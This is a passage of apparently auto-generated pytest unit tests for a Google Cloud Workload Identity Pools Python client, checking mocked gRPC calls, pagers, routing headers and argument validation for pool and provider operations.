_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.UndeleteWorkloadIdentityPoolRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.undelete_workload_identity_pool(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_undelete_workload_identity_pool_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.undelete_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_undelete_workload_identity_pool_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.undelete_workload_identity_pool(
workload_identity_pool.UndeleteWorkloadIdentityPoolRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.undelete_workload_identity_pool),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.undelete_workload_identity_pool(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_undelete_workload_identity_pool_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.undelete_workload_identity_pool(
workload_identity_pool.UndeleteWorkloadIdentityPoolRequest(),
name='name_value',
)
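# Illustrative (non-test) undelete usage, assuming a full resource name of
# the documented form:
#
#     name = 'projects/123/locations/global/workloadIdentityPools/my-pool'
#     operation = client.undelete_workload_identity_pool(name=name)
#     operation.result()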
def test_list_workload_identity_pool_providers(transport: str = 'grpc', request_type=workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
next_page_token='next_page_token_value',
)
response = client.list_workload_identity_pool_providers(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkloadIdentityPoolProvidersPager)
assert response.next_page_token == 'next_page_token_value'
def test_list_workload_identity_pool_providers_from_dict():
test_list_workload_identity_pool_providers(request_type=dict)
def test_list_workload_identity_pool_providers_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
client.list_workload_identity_pool_providers()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
next_page_token='next_page_token_value',
))
response = await client.list_workload_identity_pool_providers(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkloadIdentityPoolProvidersAsyncPager)
assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_async_from_dict():
await test_list_workload_identity_pool_providers_async(request_type=dict)
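# The AsyncPager asserted above is consumed with ``async for``. Illustrative
# (non-test) usage, assuming a parent pool resource name:
#
#     pager = await client.list_workload_identity_pool_providers(
#         parent='projects/123/locations/global/workloadIdentityPools/my-pool')
#     async for provider in pager:
#         print(provider.name)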
def test_list_workload_identity_pool_providers_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse()
client.list_workload_identity_pool_providers(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse())
await client.list_workload_identity_pool_providers(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_list_workload_identity_pool_providers_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_workload_identity_pool_providers(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
def test_list_workload_identity_pool_providers_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_workload_identity_pool_providers(
workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest(),
parent='parent_value',
)
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_workload_identity_pool_providers(
parent='parent_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_workload_identity_pool_providers(
workload_identity_pool.ListWorkloadIdentityPoolProvidersRequest(),
parent='parent_value',
)
def test_list_workload_identity_pool_providers_pager():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
),
RuntimeError,
)
metadata = (
gapic_v1.routing_header.to_grpc_metadata((
('parent', ''),
)),
)
pager = client.list_workload_identity_pool_providers(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, workload_identity_pool.WorkloadIdentityPoolProvider)
for i in results)
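# The pager walks pages lazily by following next_page_token. The iteration
# contract, sketched (simplified from the api_core page-iterator pattern):
#
#     def iterate(fetch, request):
#         while True:
#             page = fetch(request)
#             yield from page.workload_identity_pool_providers
#             if not page.next_page_token:
#                 break
#             request.page_token = page.next_page_token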
def test_list_workload_identity_pool_providers_pages():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__') as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
),
RuntimeError,
)
pages = list(client.list_workload_identity_pool_providers(request={}).pages)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_async_pager():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
),
RuntimeError,
)
async_pager = await client.list_workload_identity_pool_providers(request={})
assert async_pager.next_page_token == 'abc'
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, workload_identity_pool.WorkloadIdentityPoolProvider)
for i in responses)
@pytest.mark.asyncio
async def test_list_workload_identity_pool_providers_async_pages():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workload_identity_pool_providers),
'__call__', new_callable=mock.AsyncMock) as call:
# Set the response to a series of pages.
call.side_effect = (
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='abc',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[],
next_page_token='def',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
next_page_token='ghi',
),
workload_identity_pool.ListWorkloadIdentityPoolProvidersResponse(
workload_identity_pool_providers=[
workload_identity_pool.WorkloadIdentityPoolProvider(),
workload_identity_pool.WorkloadIdentityPoolProvider(),
],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_workload_identity_pool_providers(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ['abc','def','ghi', '']):
assert page_.raw_page.next_page_token == token
def test_get_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.GetWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPoolProvider(
name='name_value',
display_name='display_name_value',
description='description_value',
state=workload_identity_pool.WorkloadIdentityPoolProvider.State.ACTIVE,
disabled=True,
attribute_condition='attribute_condition_value',
aws=workload_identity_pool.WorkloadIdentityPoolProvider.Aws(account_id='account_id_value'),
)
response = client.get_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workload_identity_pool.WorkloadIdentityPoolProvider)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.description == 'description_value'
assert response.state == workload_identity_pool.WorkloadIdentityPoolProvider.State.ACTIVE
assert response.disabled is True
assert response.attribute_condition == 'attribute_condition_value'
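# The stubbed response above also populates the provider oneof via ``aws``.
# For reference, that variant constructed in isolation (value illustrative):
#
#     provider = workload_identity_pool.WorkloadIdentityPoolProvider(
#         aws=workload_identity_pool.WorkloadIdentityPoolProvider.Aws(
#             account_id='123456789012'))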
def test_get_workload_identity_pool_provider_from_dict():
test_get_workload_identity_pool_provider(request_type=dict)
def test_get_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
client.get_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.GetWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPoolProvider(
name='name_value',
display_name='display_name_value',
description='description_value',
state=workload_identity_pool.WorkloadIdentityPoolProvider.State.ACTIVE,
disabled=True,
attribute_condition='attribute_condition_value',
))
response = await client.get_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workload_identity_pool.WorkloadIdentityPoolProvider)
assert response.name == 'name_value'
assert response.display_name == 'display_name_value'
assert response.description == 'description_value'
assert response.state == workload_identity_pool.WorkloadIdentityPoolProvider.State.ACTIVE
assert response.disabled is True
assert response.attribute_condition == 'attribute_condition_value'
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_async_from_dict():
await test_get_workload_identity_pool_provider_async(request_type=dict)
def test_get_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
call.return_value = workload_identity_pool.WorkloadIdentityPoolProvider()
client.get_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.GetWorkloadIdentityPoolProviderRequest()
request.name = 'name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPoolProvider())
await client.get_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'name=name/value',
) in kw['metadata']
def test_get_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = workload_identity_pool.WorkloadIdentityPoolProvider()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
def test_get_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_workload_identity_pool_provider(
workload_identity_pool.GetWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workload_identity_pool.WorkloadIdentityPoolProvider())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_workload_identity_pool_provider(
name='name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_workload_identity_pool_provider_flattened_error_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_workload_identity_pool_provider(
workload_identity_pool.GetWorkloadIdentityPoolProviderRequest(),
name='name_value',
)
def test_create_workload_identity_pool_provider(transport: str = 'grpc', request_type=workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.create_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_create_workload_identity_pool_provider_from_dict():
test_create_workload_identity_pool_provider(request_type=dict)
def test_create_workload_identity_pool_provider_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
client.create_workload_identity_pool_provider()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_async(transport: str = 'grpc_asyncio', request_type=workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest):
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.create_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_async_from_dict():
await test_create_workload_identity_pool_provider_async(request_type=dict)
def test_create_workload_identity_pool_provider_field_headers():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.create_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
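# The x-goog-request-params metadata entry asserted above implements implicit
# routing: URI-bound request fields are mirrored into a header so proxies can
# route the call without parsing the body. A minimal sketch of that
# construction (an illustration only, not the generated client's helper):
def _example_routing_header(request):
    # Build the header value from the request's routing field.
    params = 'parent={}'.format(request.parent)
    return ('x-goog-request-params', params)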
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_field_headers_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.create_workload_identity_pool_provider(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
def test_create_workload_identity_pool_provider_flattened():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/op')
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_workload_identity_pool_provider(
parent='parent_value',
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
workload_identity_pool_provider_id='workload_identity_pool_provider_id_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].parent == 'parent_value'
assert args[0].workload_identity_pool_provider == workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value')
assert args[0].workload_identity_pool_provider_id == 'workload_identity_pool_provider_id_value'
def test_create_workload_identity_pool_provider_flattened_error():
client = WorkloadIdentityPoolsClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.create_workload_identity_pool_provider(
workload_identity_pool.CreateWorkloadIdentityPoolProviderRequest(),
parent='parent_value',
workload_identity_pool_provider=workload_identity_pool.WorkloadIdentityPoolProvider(name='name_value'),
workload_identity_pool_provider_id='workload_identity_pool_provider_id_value',
)
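# A sketch of the rule the test above enforces (hypothetical helper, not the
# library's API): a request object and flattened keyword fields are mutually
# exclusive, since the client cannot know which one should take precedence.
def _example_check_flattened_exclusive(request, **flattened):
    if request is not None and any(v is not None for v in flattened.values()):
        raise ValueError("If the `request` argument is set, then none of "
                         "the individual field arguments should be set.")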
@pytest.mark.asyncio
async def test_create_workload_identity_pool_provider_flattened_async():
client = WorkloadIdentityPoolsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_workload_identity_pool_provider),
'__call__') as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
